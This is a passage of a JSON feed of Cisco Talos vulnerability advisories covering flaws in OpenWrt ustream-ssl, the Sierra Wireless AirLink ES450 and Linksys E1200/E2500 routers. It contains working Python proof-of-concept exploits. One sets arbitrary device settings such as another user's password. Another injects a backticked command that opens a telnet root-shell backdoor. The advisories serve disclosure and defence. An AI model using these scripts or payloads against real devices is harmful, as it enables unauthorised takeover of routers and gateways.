executed on the stream [4], allowing a man-in-the-middle attacker, by suppling any certificate, to read the data written into the stream.\n\nDespite this, the code in `__ustream_ssl_poll` will terminate a few calls later:\n \n \n static bool __ustream_ssl_poll(struct ustream *s)\n {\n struct ustream_ssl *us = container_of(s->next, struct ustream_ssl, stream);\n char *buf;\n int len, ret;\n bool more = false;\n \n ustream_ssl_check_conn(us);\n if (!us->connected || us->error)\n return false;\n \n do {\n buf = ustream_reserve(&us->stream, 1, &len);\n if (!len)\n break;\n \n ret = __ustream_ssl_read(us, buf, len); // [9]\n switch (ret) {\n case U_SSL_PENDING: // [10]\n return more;\n case U_SSL_ERROR:\n return false;\n case 0:\n us->stream.eof = true;\n ustream_state_change(&us->stream);\n return false;\n default:\n ustream_fill_read(&us->stream, ret);\n more = true;\n continue;\n }\n } while (1);\n \n return more;\n }\n \n\nAt [9], the stream is read, but the underlying `SSL_read` function (defined in the `OpenSSL` library) will error out and the function will exit at [10].\n\n#### CVE-2019-5102 - mbed TLS (libustream-mbedtls)\n\nThe same issue exists in the `libustream-mbedtls` package, the affected code [11] is similar:\n \n \n __hidden enum ssl_conn_status __ustream_ssl_connect(struct ustream_ssl *us)\n {\n void *ssl = us->ssl;\n int r;\n \n r = mbedtls_ssl_handshake(ssl);\n if (r == 0) {\n ustream_ssl_verify_cert(us);\n return U_SSL_OK; // [11]\n }\n \n if (ssl_do_wait(r))\n return U_SSL_PENDING;\n \n ustream_ssl_error(us, r);\n return U_SSL_ERROR;\n }\n \n\n##### TIMELINE\n\n2019-09-11 - Vendor disclosure \n2019-11-13 - Vendor patched \n2019-11-15 - Public release\n\n##### Credit\n\nDiscovered by Claudio Bozzato of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2019-0879\n\nPrevious Report\n\nTALOS-2019-0845\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-11-15T00:00:00", "type": "talos", "title": "OpenWrt ustream-ssl certificate verification information leak vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5101", "CVE-2019-5102"], "modified": "2019-11-15T00:00:00", "id": "TALOS-2019-0893", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0893", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-01T16:54:30", "description": "### Summary\n\nAn exploitable Permission Assignment vulnerability exists in the ACEManager Embedded_Ace_Set_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause a arbitrary setting writes, resulting in the unverified changes to any system setting. An attacker can make an authenticated HTTP request, or run the binary as any user, to trigger this vulnerability.\n\n### Tested Versions\n\nSierra Wireless AirLink ES450 FW 4.9.3\n\n### Product URLs\n\n<https://www.sierrawireless.com/products-and-solutions/routers-gateways/es450/>\n\n### CVSSv3 Score\n\n9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L\n\n### CWE\n\nCWE-732: Incorrect Permission Assignment for Critical Resource\n\n### Details\n\nSierra Wireless is a wireless communications equipement designer and manufacturer. They provide both embedded solutions as well as wireless hardware solutions, including both the ES450 and GX450 devices. The AirLink ES450 is a LTE gateway designed for distributed enterprise. The ES450 is typically seen connecting Point-of-sale devices, remote SCADA equipment, or other business critical equipment. The AirLink ES450 also provides a terminal server for remote out-of-band administration.\n\nACEManager is the web server included with the AirLink ES450. This web server is responsible for the majority of interactions in the device. Some specific capabilities of the web server are routing, device reconfiguration, user authentication and certificate management. The vendor has stated that the ACEManager web application is not accessible by default from the Cellular WAN.\n\nThese vulnerabilities were discovered and tested using the AirLink ES450. Most likely this vulnerabilities also affects the AirLink GX450 product as well.\n\n#### CVE-2018-4072\n\nThe Embedded_Ace_Set_Task.cgi executable is used to change MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the `/cgi-bin/Embedded_Ace_Set_Task.cgi` endpoint. The following request shows the MSCIID for changing the `user` password for the device.\n \n \n POST /cgi-bin/Embedded_Ace_Set_Task.cgi HTTP/1.1\n Host: 192.168.13.31:9191\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\n Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html\n Content-Type: text/xml\n Cache-Control: no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 15\n Cookie: token=8b61123e579dcaa49a707abc4fcc1016\n Connection: close\n \n 5003=password0\n \n\nThis binary has `-rwxr-xr-x` permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to change the password of other users on the system, enable or disable services, and change any configuration set on the device.\n\n#### CVE-2018-4073\n\nAdditionally, the binary the endpoint `/cgi-bin/Embeded_Ace_TLSet_Task.cgi` is a very similar endpoint that is designed for use with setting table values. The following request shows the MSCIID for changing the `user` password for the device\n \n \n POST /cgi-bin/Embedded_Ace_TLSet_Task.cgi HTTP/1.1\n Host: 192.168.13.31:9191\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\n Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html\n Content-Type: text/xml\n Cache-Control: no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 28\n Cookie: token=30578cf7228232d357e029347617af5c\n Connection: close\n \n colsid=5003&data=password012\n \n\nThis binary has `-rwxr-xr-x` permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to change the password of other users on the system, enable or disable services, and change any configuration set on the device.\n\n### Exploit Proof of Concept\n \n \n #!/usr/bin/env python\n #Author : Carl Hurd, Cisco Talos\n import sys\n import socket\n import time\n import requests\n \n from requests_toolbelt.utils import dump\n \n def auth(ip, port, password):\n data = \"\"\"<request xmlns=\"urn:acemanager\">\n <connect>\n <login>user</login>\n <password><![CDATA[{}]]></password>\n </connect>\n </request>\"\"\".format(password)\n \n response = requests.post(\"http://\"+ip+\":\"+port+\"/xml/Connect.xml\", data=data)\n \n try:\n cookies = dict(token=response.headers[\"Set-Cookie\"].split(\"; \")[0][len(\"token=\"):])\n return cookies\n except:\n print(\"Error while authenticating\")\n sys.exit(0)\n \n def main():\n if len(sys.argv) < 6 or len(sys.argv) > 6:\n print(\"Usage : {} [ip address] [port] [password of user] [msciid to set] [msciid value]\".format(sys.argv[0]))\n sys.exit(0)\n \n ip = sys.argv[1]\n port = sys.argv[2]\n password = sys.argv[3]\n msciid = sys.argv[4]\n msciid_val = sys.argv[5]\n \n print(\"MSCIID : {}\\nMSCIID VALUE : {}\".format(msciid, msciid_val))\n \n cookies = auth(ip, port, password)\n \n data = msciid + \"=\" + msciid_val\n response = requests.post(\"http://\"+ip+\":\"+port+\"/cgi-bin/Embedded_Ace_Set_Task.cgi\", cookies=cookies, data=data)\n \n print(response.text)\n \n if __name__ == \"__main__\":\n main()\n \n\n### Timeline\n\n2018-12-14 - Vendor disclosure \n2018-12-17 - Vendor acknowledged \n2019-01-08 - Discussion to review vendor\u2019s analysis of issues&lt;br 2019-02-26 - Vendor provided analysis of CVSS scoring \n2019-03-26 - Vendor established timelines for fix/public disclosure \n2019-04-20 - Talos provided revised CVSS score on TALOS-2018-0746, TALOS-2018-0751, TALOS-2018-0752, TALOS-2018-0755, and TALOS-2018-0756 \n2019-04-25 - Public Release\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-25T00:00:00", "type": "talos", "title": "Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Set_Task.cgi Permission Assignment Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4072", "CVE-2018-4073"], "modified": "2019-04-25T00:00:00", "id": "TALOS-2018-0756", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0756", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T16:54:50", "description": "### Summary\n\nMultiple exploitable operating system command injections exist in the Linksys ESeries line of routers. Specially crafted entries to network configuration information can cause execution of arbitrary system commands, resulting in full control of the device. An attacker can send an authenticated HTTP request to trigger this vulnerability.\n\n### Tested Versions\n\nLinksys E1200 Firmware Version 2.0.09 Linksys E2500 Firmware Version 3.0.04\n\n### Product URLs\n\n<https://www.linksys.com/us/support-product?pid=01t80000003KRTzAAO> \n<https://www.linksys.com/us/support-product?pid=01t80000003KZuNAAW>\n\n### CVSSv3 Score\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-78: Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n### Details\n\nMultiple devices in the Linksys ESeries line of routers are susceptible to OS command injection vulnerabilities due to improper filtering of data passed to and retrieved from NVRAM.\n\nMany of the configuration details passed to ESeries routers during configuration must be retained across a device\u2019s power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details.\n\nWhen the apply.cgi page is requested with parameters indicating a change to persistent configuration settings, those parameters are processed by the \u2018get_cgi\u2019 function call during which they get placed directly into NVRAM via a \u2018set_nvram\u2019 call.\n\nThe following example is the apply.cgi disassembly of the path that is taken to write any passed configuration data to NVRAM. Execution starts at address 0x00425C20 where the variables are first loaded, and then enters a loop until all passed variables are processed.\n \n \n ### binary: httpd\n .text:0041FBC4 li $gp, 0xE760C\n .text:0041FBCC addu $gp, $t9\n .text:0041FBD0 addiu $sp, -0x28\n .text:0041FBD4 sw $ra, 0x20($sp) # stores return address onto stack (0x00425CAC)\n .text:0041FBD8 sw $s1, 0x1C($sp)\n .text:0041FBDC sw $s0, 0x18($sp)\n .text:0041FBE0 sw $gp, 0x10($sp)\n .text:0041FBE4 la $t9, valid_name # valid_name checks to ensure the name is expected\n .text:0041FBE8 move $s1, $a1 # $s1 == RAW_MACHINE_NAME_DATA\n .text:0041FBEC jalr $t9 # goto: valid_name\n .text:0041FBF0 move $s0, $a2\n .text:0041FBF4 lw $gp, 0x10($sp)\n .text:0041FBF8 bnez $v0, loc_41FC14 # $v0 != 0 for vulnerable params\n .text:0041FBFC move $a1, $s1 # $a1 == RAW_MACHINE_NAME_DATA \n ...\n .text:0041FC14 loc_41FC14:\n .text:0041FC14 lw $a0, 0($s0) # $a0 == VULN_PARAM\n .text:0041FC18 la $t9, nvram_set\n .text:0041FC1C lw $ra, 0x20($sp) # gets return address back from stack (0x00425CAC)\n .text:0041FC20 lw $s1, 0x1C($sp)\n .text:0041FC24 lw $s0, 0x18($sp)\n .text:0041FC28 jr $t9 # goto: nvram_set(VULN_PARAM, RAW_MACHINE_NAME_DATA)\n .text:0041FC2C addiu $sp, 0x28\n ...\n .text:00425C20 loc_425C20: ## VARIABLE_LOAD\n .text:00425C20 \n .text:00425C20 la $s0, variables # POST data\n .text:00425C24 b loc_425C5C # jumps to start of loop\n .text:00425C28 addiu $s1, $s0, (gozila_actions - 0x4FB070)\n ...\n .text:00425C54 loc_425C54:\n .text:00425C54 beq $s0, $s1, loc_425CB8\n .text:00425C58 nop\n .text:00425C5C\n .text:00425C5C loc_425C5C: ## LOOP_START\n .text:00425C5C la $t9, get_cgi\n .text:00425C60 lw $a0, 0($s0) # $a0 == VULN_PARAM\n .text:00425C64 jalr $t9 # goto: get_cgi\n .text:00425C68 nop # $v0 == RAW_MACHINE_NAME_DATA\n .text:00425C6C lw $gp, 0x860+var_840($sp)\n .text:00425C70 move $v1, $v0 # RAW_MACHINE_NAME_DATA moved to $v1\n .text:00425C74 la $t9, nvram_set\n .text:00425C78 move $a1, $v0\n .text:00425C7C beqz $v0, loc_425C50 # $v0 != 0 for vulnerable params\n .text:00425C80 move $a3, $t9\n .text:00425C84 lb $v0, 0($v0) # $v0 set to first byte of RAW_MACHINE_NAME_DATA\n .text:00425C88 move $a2, $s0\n .text:00425C8C beqz $v0, loc_425C2C # $v0 != 0 for vulnerable params\n .text:00425C90 move $a0, $s7\n .text:00425C94\n .text:00425C94 loc_425C94:\n .text:00425C94 lw $t9, 8($s0) # loads an address to check the key name\n .text:00425C98 nop\n .text:00425C9C beqz $t9, loc_425C3C # $t9 != 0 for vulnerable params\n .text:00425CA0 nop\n .text:00425CA4 jalr $t9 # goto: 0x0041FBC4\n .text:00425CA8 move $a1, $v1 # sets arg to RAW_MACHINE_NAME_DATA\n .text:00425CAC lw $gp, 0x860+var_840($sp)\n .text:00425CB0 b loc_425C54 # goto: LOOP_START\n .text:00425CB4 addiu $s0, 0x18\n \n\nAfter certain configuration changes are made, including both of the changes associated with these vulnerabilities, a reboot of device services is required. The httpd binary handles this by sending a SIGHUP signal to PID 1, a binary named \u2018preinit\u2019. When \u2018preinit\u2019 receives this signal it enters a code path where it restarts all necessary system services. This example can be seen in the apply.cgi disassembly below:\n \n \n ### binary: httpd\n .text:00425824 loc_425824:\n .text:00425824 la $t9, kill\n .text:00425828 li $a0, 1 # pid\n .text:0042582C jalr $t9 # runs: kill -1 1\n .text:00425830 li $a1, 1 # sig\n .text:00425834 lw $gp, 0x860+var_840($sp)\n .text:00425838 b loc_4256AC\n .text:0042583C nop\n \n\nWhen the \u2018preinit\u2019 binary enters this code path, it exposes functionality where raw data from nvram_get calls is passed into system commands. Examples for each of the three command injection vulnerabilities can be seen below.\n\nCVE-2018-3953 - machine_name - start_lltd\n\nData entered into the \u2018Router Name\u2019 input field through the web portal is submitted to apply.cgi as the value to the \u2018machine_name\u2019 POST parameter. The machine_name data goes through the nvram_set process described above. When the \u2018preinit\u2019 binary receives the SIGHUP signal it enters a code path that continues until it reaches offset 0x0042B5C4 in the \u2018start_lltd\u2019 function. Within the \u2018start_lltd\u2019 function, a \u2018nvram_get\u2019 call is used to obtain the value of the user-controlled \u2018machine_name\u2019 NVRAM entry. This value is then entered directly into a command intended to write the host name to a file and subsequently executed.\n \n \n ### binary: preinit\n .text:0042B5C4 loc_42B5C4:\n .text:0042B5C4 la $a0, sub_470000\n .text:0042B5C8 la $t9, nvram_get\n .text:0042B5CC move $t9, $s0\n .text:0042B5D0 jalr $t9 # nvram_get(\"machine_name\")\n .text:0042B5D4 addiu $a0, (aMachineName - 0x470000) # \"machine_name\"\n .text:0042B5D8 lw $gp, 0x130+var_120($sp)\n .text:0042B5DC beqz $v0, loc_42B6C0 # $v0 == RAW_MACHINE_NAME_DATA\n .text:0042B5E0 nop\n .text:0042B5E4\n .text:0042B5E4 loc_42B5E4:\n .text:0042B5E4 la $a1, aORemoteServer\n .text:0042B5E8 la $t9, sprintf\n .text:0042B5EC addiu $s1, $sp, 0x130+var_118\n .text:0042B5F0 addiu $a1, (aEchoSProcSysKe - 0x480000) # $a1 == \"echo %s > /proc/sys/kernel/hostname\"\n .text:0042B5F4 move $a2, $v0 # $a2 == RAW_MACHINE_NAME_DATA\n .text:0042B5F8 move $a0, $s1 # $a0 == $s1\n .text:0042B5FC jalr $t9 ; sprintf # sprintf($s1, \"echo %s > /proc/sys/kernel/hostname\", RAW_MACHINE_NAME_DATA)\n .text:0042B600 move $s3, $t9\n .text:0042B604 lw $gp, 0x130+var_120($sp)\n .text:0042B608 move $a0, $s1 # $a0 == FINAL_CMD\n .text:0042B60C la $t9, system\n .text:0042B610 nop\n .text:0042B614 jalr $t9 # system(\"echo RAW_MACHINE_NAME_DATA > /proc/sys/kernel/hostname\")\n .text:0042B618 move $s2, $t9\n \n\nCVE-2018-3954 - machine_name - set_host_domain_name\n\nData entered into the \u2018Router Name\u2019 input field through the web portal is submitted to apply.cgi as the value to the \u2018machine_name\u2019 POST parameter. The machine_name data goes through the nvram_set process described above. When the \u2018preinit\u2019 binary receives the SIGHUP signal it enters a code path that calls a function named \u2018set_host_domain_name\u2019 from its libshared.so shared object.\n \n \n ### binary: preinit\n .text:0041F040 loc_41F040:\n .text:0041F040 la $a0, aORemoteServer\n .text:0041F044 la $t9, nvram_set\n .text:0041F048 addiu $a0, (aWanRunMtu - 0x480000)\n .text:0041F04C move $a1, $v0\n .text:0041F050 jalr $t9\n .text:0041F054 move $s3, $t9\n .text:0041F058 lw $gp, 0xD0+var_B0($sp)\n .text:0041F05C nop\n .text:0041F060 la $t9, set_host_domain_name # function containing vuln\n .text:0041F064 nop\n .text:0041F068 jalr $t9 # goto: set_host_domain_name\n .text:0041F06C nop\n \n\nThe \u2018set_host_domain_name\u2019 function in libshared.so continues to offset 0x0001FA40 where nvram_get is called against the \u2018machine_name\u2019 parameter. The result of that operation is subsequently combined with a string via a sprintf call and passed directly into system.\n \n \n ### shared object: libshared.so\n .text:0001FA10 set_host_domain_name:\n .text:0001FA10\n .text:0001FA10 var_118 = -0x118\n .text:0001FA10 var_110 = -0x110\n .text:0001FA10 var_10 = -0x10\n .text:0001FA10 var_C = -0xC\n .text:0001FA10 var_8 = -8\n .text:0001FA10 var_4 = -4\n .text:0001FA10\n .text:0001FA10 li $gp, 0xB4800\n .text:0001FA18 addu $gp, $t9\n .text:0001FA1C addiu $sp, -0x128\n .text:0001FA20 sw $ra, 0x128+var_4($sp)\n .text:0001FA24 sw $s2, 0x128+var_8($sp)\n .text:0001FA28 sw $s1, 0x128+var_C($sp)\n .text:0001FA2C sw $s0, 0x128+var_10($sp)\n .text:0001FA30 sw $gp, 0x128+var_118($sp)\n .text:0001FA34 la $a0, aAluesMayBeInco\n .text:0001FA38 la $t9, nvram_get\n .text:0001FA3C addiu $a0, (aMachineName - 0x70000) # $a0 == \"machine_name\"\n .text:0001FA40 jalr $t9 # nvram_get(\"machine_name\")\n .text:0001FA44 move $s0, $t9\n .text:0001FA48 lw $gp, 0x128+var_118($sp)\n .text:0001FA4C beqz $v0, loc_1FBF0 # $v0 == RAW_MACHINE_NAME_DATA\n .text:0001FA50 nop\n .text:0001FA54\n .text:0001FA54 loc_1FA54:\n .text:0001FA54 la $a1, aAluesMayBeInco\n .text:0001FA58 la $t9, sprintf\n .text:0001FA5C addiu $s1, $sp, 0x128+var_110\n .text:0001FA60 addiu $a1, (aEchoSProcSysKe - 0x70000) # $a1 == \"echo \\\"%s\\\" > /proc/sys/kernel/hostname\"\n .text:0001FA64 move $a2, $v0 # $a2 == RAW_MACHINE_NAME_DATA\n .text:0001FA68 jalr $t9 # sprintf($s1, \"echo \\\"%s\\\" > /proc/sys/kernel/hostname\", RAW_MACHINE_NAME_DATA)\n .text:0001FA6C move $a0, $s1 # $a0 == $s1\n .text:0001FA70 lw $gp, 0x128+var_118($sp)\n .text:0001FA74 nop\n .text:0001FA78 la $t9, system\n .text:0001FA7C nop\n .text:0001FA80 jalr $t9 # system(\"echo \\\"[RAW_MACHINE_NAME_DATA]\\\" > /proc/sys/kernel/hostname\")\n .text:0001FA84 move $a0, $s1 # \"echo \\\"[RAW_MACHINE_NAME_DATA]\\\" > /proc/sys/kernel/hostname\"\n \n\nCVE-2018-3955 - wan_domain - set_host_domain_name\n\nData entered into the \u2018Domain Name\u2019 input field through the web portal is submitted to apply.cgi as the value to the \u2018wan_domain\u2019 POST parameter. The wan_domain data goes through the nvram_set process described above. When the \u2018preinit\u2019 binary receives the SIGHUP signal it enters a code path that calls a function named \u2018set_host_domain_name\u2019 from its libshared.so shared object.\n \n \n ### binary: preinit\n .text:0041F040 loc_41F040:\n .text:0041F040 la $a0, aORemoteServer\n .text:0041F044 la $t9, nvram_set\n .text:0041F048 addiu $a0, (aWanRunMtu - 0x480000)\n .text:0041F04C move $a1, $v0\n .text:0041F050 jalr $t9\n .text:0041F054 move $s3, $t9\n .text:0041F058 lw $gp, 0xD0+var_B0($sp)\n .text:0041F05C nop\n .text:0041F060 la $t9, set_host_domain_name # function containing vuln\n .text:0041F064 nop\n .text:0041F068 jalr $t9 # goto: set_host_domain_name\n .text:0041F06C nop\n \n\nThe \u2018set_host_domain_name\u2019 function in libshared.so continues until offset 0x0001FBCC where nvram_get is called against the \u2018wan_domain\u2019 parameter. The result of that operation is subsequently combined with a string via a snprintf call and passed directly into system.\n \n \n ## shared object: libshared.so\n .text:0001FB7C loc_1FB7C:\n .text:0001FB7C\n .text:0001FB7C la $a2, aAluesMayBeInco\n .text:0001FB80 la $t9, snprintf\n .text:0001FB84 move $a0, $s1 # $a0 == $s1 == ptr to final cmd buffer\n .text:0001FB88 addiu $a2, (aEchoSProcSysKe_0 - 0x70000) # $a2 == \"echo \\\"%s\\\" > /proc/sys/kernel/domainname\"\n .text:0001FB8C move $a3, $v0 # $a3 == RAW_MACHINE_NAME_DATA\n .text:0001FB90 jalr $t9 ; snprintf # snprintf($s1, 0xFE, \"echo \\\"%s\\\" > /proc/sys/kernel/domainname\", RAW_MACHINE_NAME_DATA)\n .text:0001FB94 li $a1, 0xFE # $a1 == snprintf max size\n .text:0001FB98 lw $gp, 0x128+var_118($sp)\n .text:0001FB9C nop\n .text:0001FBA0 la $t9, system\n .text:0001FBA4 nop\n .text:0001FBA8 jalr $t9 ; system # system(\"echo \\\"[RAW_MACHINE_NAME_DATA]\\\" > /proc/sys/kernel/domainname\")\n .text:0001FBAC move $a0, $s1 \n .text:0001FBB0 lw $gp, 0x128+var_118($sp)\n .text:0001FBB4 lw $ra, 0x128+var_4($sp)\n .text:0001FBB8 lw $s2, 0x128+var_8($sp)\n .text:0001FBBC lw $s1, 0x128+var_C($sp)\n .text:0001FBC0 lw $s0, 0x128+var_10($sp)\n .text:0001FBC4 jr $ra\n .text:0001FBC8 addiu $sp, 0x128\n .text:0001FBCC loc_1FBCC: \n .text:0001FBCC\n .text:0001FBCC la $t9, nvram_get\n .text:0001FBD0 move $t9, $s0\n .text:0001FBD4 jalr $t9 # nvram_get(\"wan_domain\")\n .text:0001FBD8 addiu $a0, $s2, (aWanDomain - 0x70000) # $a0 == \"wan_domain\"\n .text:0001FBDC lw $gp, 0x128+var_118($sp)\n .text:0001FBE0 bnez $v0, loc_1FB7C # $v0 == RAW_MACHINE_NAME_DATA\n .text:0001FBE4 nop\n .text:0001FBE8 b loc_1FB20\n .text:0001FBEC nop\n \n\n### Crash Information\n\nN/A\n\n### Exploit Proof of Concept\n\nUsage: python poc.py [vulnerable_param] [target_ip] [port_to_open]\n\nVulnerable parameters: \\- wan_domain \\- machine_name\n\nExample: python poc.py wan_domain 192.168.1.1 1337\n\nNOTE: This proof of concept will work for both the E1200 and the E2500.\n \n \n Differences in authentication are handled by a request to /HNAP1:\n \n import requests\n import hashlib\n import sys\n import re\n from time import sleep\n \n def printError(additionalComment):\n if additionalComment != \"\":\n print \"[!] ERROR: %s\" % additionalComment\n print \"Usage: python poc.py [vulnerable_param] [target_ip] [port_to_open]\"\n print \"\"\n print \"Vulnerable Parameters\"\n print \" - wan_domain\"\n print \" - machine_name\"\n exit(0)\n \n def hashPassword(password):\n password_size = len(password)\n if password_size < 10:\n password_size = \"0%s\" % (password_size)\n base_key = \"%s%s\" % (password, password_size)\n base_key_size = len(base_key)\n max_password_size = 64\n key = \"\"\n for i in xrange(max_password_size):\n key = \"%s%s\" % (key, base_key[i%base_key_size])\n \n hashed_password = hashlib.md5(key).hexdigest()\n return hashed_password\n \n def sendCmd(param, base_uri, session, cmd):\n # format command appropriately\n cmd = \"`%s `\" % (cmd)\n \n # set up header details\n uri = \"%s/apply.cgi%s\" % (base_uri, session)\n referer = \"%s/index.asp?%s\" % (base_uri, session)\n headers = {\"Referer\":referer}\n \n # set the desired parameter\n machine_name_cmd = \"\"\n wan_domain_cmd = \"\"\n if param == \"machine_name\":\n machine_name_cmd = cmd\n elif param == \"wan_domain\":\n wan_domain_cmd = cmd\n else:\n printError(\"An invalid parameter was entered\")\n \n # set up POST data\n data = \"submit_button=index&change_action=&submit_type=&gui_action=Apply\"\n data += \"&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=\"\n data += \"&need_reboot=0&user_language=&wait_time=0&dhcp_start=100\"\n data += \"&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9\"\n data += \"&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9\"\n data += \"&wan_ipv6_proto=dhcp&detect_lang=en&wan_proto=dhcp&wan_hostname=\"\n data += \"&wan_domain=%s&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168\" % (wan_domain_cmd)\n data += \"&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0\"\n data += \"&machine_name=%s&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100\" % (machine_name_cmd)\n data += \"&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0\"\n data += \"&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0\"\n data += \"&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0\"\n data += \"&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0\"\n data += \"&time_zone=-08+1+1&_daylight_time=1\"\n \n # make request\n res = requests.post(uri, headers=headers, data=data)\n sleep(30)\n \n def main():\n # check input\n if len(sys.argv) != 4:\n printError(\"\")\n \n param = sys.argv[1]\n rhost = sys.argv[2]\n rport = sys.argv[3]\n \n if param != \"wan_domain\" and param != \"machine_name\":\n printError(\"An invalid parameter was entered\")\n \n user = \"admin\"\n raw_password = \"admin\"\n http_port = 80\n \n base_uri = \"http://%s:%s\" % (rhost, http_port)\n \n try:\n # get the device version to see if we have to hash the password before transmission\n # only has to happen for the E1200 at this time\n password = \"\"\n uri = \"%s/HNAP1\" % (base_uri)\n res = requests.get(uri)\n device = re.search(\"<ModelDescription>.*?</ModelDescription>\", res.text).group(0)\n device = device.split(\"<ModelDescription>\")[1]\n device = device.split(\"</ModelDescription>\")[0]\n if device == \"E1200\":\n # hash the password for transit\n password = hashPassword(raw_password)\n else:\n password = raw_password\n \n # get the session token\n print \"[*] Getting a session token using credentials %s:%s\" % (user, raw_password)\n uri = \"%s/login.cgi\" % (base_uri)\n data = \"submit_button=login&change_action=&action=Apply&wait_time=19\"\n data += \"&submit_type=&http_username=%s&http_passwd=%s\" % (user, password)\n res = requests.post(uri, data=data)\n \n # extract the session id with the required initial character (? for FRNv4 and ; for FRNv0)\n session = re.search('.session_id=[\\d\\w]{32}', res.text).group(0)\n print \"[*] Got session: %s\" % (session[12:])\n \n # start telnet backdoor\n print \"[*] Opening Backdoor\"\n cmd = \"telnetd -l/bin/sh -p%s\" % (rport)\n sendCmd(param, base_uri, session, cmd)\n \n print \"[*] done\"\n \n except Exception as e:\n printError(e)\n \n if __name__ == '__main__':\n main()\n \n\n### Timeline\n\n2018-07-09 - Vendor Disclosure \n2018-08-14 - Vendor released patch for e1200 \n2018-10-04 - Vendor released patch for e2500 \n2018-10-10 - Public disclosure\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 